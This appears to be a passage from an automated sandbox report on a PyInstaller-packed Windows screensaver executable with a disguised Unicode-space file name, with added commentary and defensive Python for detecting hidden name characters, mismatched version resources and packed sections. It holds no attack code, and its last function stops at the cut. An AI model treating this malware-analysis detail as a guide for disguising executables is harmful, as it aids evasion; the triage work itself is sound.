Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EEAAC0 68_2_00007FF7F7EEAAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EC5A70 68_2_00007FF7F7EC5A70
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EBFA6C 68_2_00007FF7F7EBFA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EC69FD 68_2_00007FF7F7EC69FD
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E849B8 68_2_00007FF7F7E849B8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EAD97C 68_2_00007FF7F7EAD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EBD91C 68_2_00007FF7F7EBD91C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: String function: 00007FF8A86EA550 appears 165 times
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: String function: 00007FF8A86E94B0 appears 134 times
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: String function: 00007FF8A8710F90 appears 34 times
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: String function: 00007FF73AE12B30 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: String function: 00007FF7F7E98444 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: String function: 00007FF7F7EC49F4 appears 53 times
Source: #U202f#U202f#U2005#U00a0.scr.exe Static PE information: invalid certificate
Source: rar.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
Source: #U202f#U202f#U2005#U00a0.scr.exe Binary or memory string: OriginalFilename vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037933852.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034682833.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035401905.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038915705.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042526776.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034476266.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035945476.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036561449.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037632410.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037785909.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035844726.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036690975.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037437086.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037218357.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038015630.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037713341.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037539805.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037350742.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035749504.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036215404.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034770359.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038812496.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036953380.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037858907.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035650264.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038238108.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038322803.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038599367.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034582747.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038707513.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000000.2032418452.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMDMAgentj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038502657.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036066040.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2035542606.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038406109.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2032727413.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037034859.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036777921.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2038117369.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2036870702.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2037125137.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmp Binary or memory string: OriginalFilenamelibsslH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343212572.00007FF8B984C000.00000004.00000001.01000000.0000000E.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342965199.00007FF8B93D8000.00000004.00000001.01000000.0000000D.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341048034.00007FF8B8CC3000.00000004.00000001.01000000.00000012.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmp Binary or memory string: OriginalFilenamelibcryptoH vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337520197.00007FF8A8853000.00000004.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340442986.00007FF8B7EEE000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340792166.00007FF8B8B42000.00000004.00000001.01000000.0000000F.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2339600779.00007FF8A8F2A000.00000004.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamepython312.dll. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2342336186.00007FF8B9094000.00000004.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341984089.00007FF8B906C000.00000004.00000001.01000000.00000013.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2333652744.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameMDMAgentj% vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341701034.00007FF8B8F9C000.00000004.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2334206076.00007FF8A81AA000.00000004.00000001.01000000.00000014.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2341319253.00007FF8B8CF3000.00000004.00000001.01000000.0000000B.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343410682.00007FF8B9F78000.00000004.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs #U202f#U202f#U2005#U00a0.scr.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2343586290.00007FF8BA259000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs #U202f#U202f#U2005#U00a0.scr.exe
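The `OriginalFilename ... vs ...` lines above compare the OriginalFilename field of every VS_VERSIONINFO string table the sandbox found in memory with the name the sample was executed under. Most of the hits (`_ctypes.pyd`, `python312.dll`, `libssl`, `sqlite3.dll`, `apisetstub`, `ucrtbase.dll`) are the version resources of files bundled in the PyInstaller one-file archive, and they are all reported from the same read/write private region in process 0 (000001CCD86C4000), which reads as the bootloader's heap buffer through which each bundled file passes while being unpacked into `_MEI17882`; those mismatches are expected noise for any PyInstaller build. The hit that matters is `MDMAgent` at 00007FF73AE52000, a read-only image-mapped region of the sample itself (its own code functions sit at 00007FF73AE1xxxx above): the binary's version resource claims to be `MDMAgent`, while its file name is four Unicode space characters followed by `.scr.exe` (the report escapes them as `#U202f#U202f#U2005#U00a0`). The Python below is an added example, not part of the report, that reproduces both checks offline: it decodes the report's `#Uxxxx` escaping, flags non-ASCII space and format characters in a file name (U+202E, the right-to-left override the RTLO signature refers to, included), and pulls each OriginalFilename value out of a buffer by walking the version-info string entry (header, key, DWORD padding, value) and stopping at the value's NUL terminator, so the value comes out without the stray trailing bytes (`j%`, `.`, `H`, `T`, `0`) that the report's string scan swept up. `build_string_entry`, `SAMPLE_IMAGE` and `SAMPLE_HEAP` are constructed here for the demonstration; on a real case pass the bytes of the dropped file or of the memory dump instead.

```python
import struct
import unicodedata

# UTF-16LE key of the VS_VERSIONINFO String entry we are after, including its NUL terminator
ORIGINAL_FILENAME_KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def decode_sandbox_name(escaped: str) -> str:
    """Undo the report's #Uxxxx escaping of non-ASCII characters in a file name."""
    out, i = [], 0
    while i < len(escaped):
        if escaped.startswith("#U", i) and i + 6 <= len(escaped):
            try:
                out.append(chr(int(escaped[i + 2:i + 6], 16)))
                i += 6
                continue
            except ValueError:
                pass
        out.append(escaped[i])
        i += 1
    return "".join(out)


def suspicious_name_chars(name: str) -> list:
    """Non-ASCII space separators (Zs) and format characters (Cf, e.g. U+202E RIGHT-TO-LEFT
    OVERRIDE) in a file name; either kind can hide or reorder the real extension in a listing."""
    return [f"U+{ord(ch):04X} {unicodedata.name(ch, '?')}"
            for ch in name if ord(ch) > 0x7F and unicodedata.category(ch) in ("Zs", "Cf")]


def _read_utf16z(buf: bytes, pos: int) -> str:
    """NUL-terminated UTF-16LE string starting at pos."""
    end = pos
    while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[pos:end].decode("utf-16-le", errors="replace")


def extract_original_filenames(buf: bytes) -> list:
    """Every OriginalFilename value found in buf (file bytes or a memory dump).

    String entry layout: WORD wLength, WORD wValueLength, WORD wType, szKey (UTF-16LE with NUL
    terminator), zero padding to a DWORD boundary relative to the entry start, then the Value
    (UTF-16LE with NUL terminator). Reading stops at the Value's terminator."""
    values = []
    pos = buf.find(ORIGINAL_FILENAME_KEY)
    while pos != -1:
        entry_start = pos - 6
        value_words = struct.unpack_from("<H", buf, entry_start + 2)[0] if entry_start >= 0 else 1
        value_pos = pos + len(ORIGINAL_FILENAME_KEY)
        value_pos += (-(value_pos - entry_start)) % 4
        values.append(_read_utf16z(buf, value_pos) if value_words else "")
        pos = buf.find(ORIGINAL_FILENAME_KEY, pos + 2)
    return values


def original_filename_mismatches(on_disk_name: str, buf: bytes) -> list:
    """OriginalFilename values matching neither the on-disk name nor that name minus its last extension."""
    disk = on_disk_name.casefold()
    stem = disk.rsplit(".", 1)[0]
    return [v for v in extract_original_filenames(buf) if v.casefold() not in (disk, stem)]


def build_string_entry(key: str, value: str) -> bytes:
    """Constructed helper for the demo: one VS_VERSIONINFO String entry as a resource compiler emits it."""
    key_b = key.encode("utf-16-le") + b"\x00\x00"
    pad = (-(6 + len(key_b))) % 4
    value_b = value.encode("utf-16-le") + b"\x00\x00"
    length = 6 + len(key_b) + pad + len(value_b)
    return struct.pack("<HHH", length, len(value) + 1, 1) + key_b + b"\x00" * pad + value_b


# Constructed buffers standing in for the two kinds of region in the report: the sample's own
# mapped image, whose resource says MDMAgent, and a bootloader heap buffer through which a
# bundled file (here _ctypes.pyd) was staged while being unpacked.
SAMPLE_IMAGE = b"\x00" * 16 + build_string_entry("OriginalFilename", "MDMAgent") + b"\x00" * 8
SAMPLE_HEAP = b"\xcc" * 32 + build_string_entry("OriginalFilename", "_ctypes.pyd") + b"\xcc" * 4
SAMPLE_NAME = decode_sandbox_name("#U202f#U202f#U2005#U00a0.scr.exe")

if __name__ == "__main__":
    print("hidden chars:", suspicious_name_chars(SAMPLE_NAME))
    print("image mismatch:", original_filename_mismatches(SAMPLE_NAME, SAMPLE_IMAGE))
    print("heap mismatch:", original_filename_mismatches(SAMPLE_NAME, SAMPLE_HEAP))
```

When triaging a PyInstaller sample, run `original_filename_mismatches` over the main executable's bytes and, separately, over each file dropped into `_MEI<pid>`; a mismatch on a dropped runtime file (for example `ucrtbase.dll` whose resource says something else) would mean a tampered dependency, while mismatches seen only in the bootloader's heap are the archive contents passing through and carry no signal.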
Source: libcrypto-3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
Source: libssl-3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
Source: python312.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9992524518674001
Source: sqlite3.dll.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9974527256801319
Source: unicodedata.pyd.0.dr Static PE information: Section: UPX1 ZLIB complexity 0.9951941924283154
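The `ZLIB complexity` figures above are the ratio of a section's zlib-compressed size to its raw size. A value near 1.0 means the bytes are already compressed or encrypted, which for a section named `UPX1` is simply UPX's compressed payload (UPX leaves `UPX0` as an empty placeholder and stores the packed image in `UPX1`). Five of the dropped runtime files (`libcrypto-3.dll`, `libssl-3.dll`, `python312.dll`, `sqlite3.dll`, `unicodedata.pyd`) were shipped UPX-packed; PyInstaller applies UPX to collected binaries automatically when it finds a `upx` executable (see its `--noupx` and `--upx-dir` options), so that is the likely cause, though whether the sample was built that way is an assumption. Packing hides the libraries' strings from static scanners but is undone with `upx -d`. The Python below is an added example, not anything from the report, that computes the same metric (plus Shannon entropy, the more common form of this check) for every section of a PE read from disk, with a minimal section-table reader and no third-party dependency. `build_minimal_pe` and `SAMPLE_PE` are constructed test input (a skeletal, non-loadable PE32+ whose `UPX1` section holds seeded pseudo-random bytes standing in for a compressed payload), and the 0.95 threshold is a working assumption rather than a figure from the report.

```python
import math
import random
import struct
import zlib


def zlib_complexity(data: bytes) -> float:
    """Compressed size divided by raw size, the report's 'ZLIB complexity'.
    Already-compressed or encrypted bytes come out near 1.0; plain code or data far lower."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0); packed sections usually sit above ~7.2."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def iter_sections(pe: bytes):
    """Yield (name, raw bytes) for each section header of a PE file read from disk (PE32 or PE32+)."""
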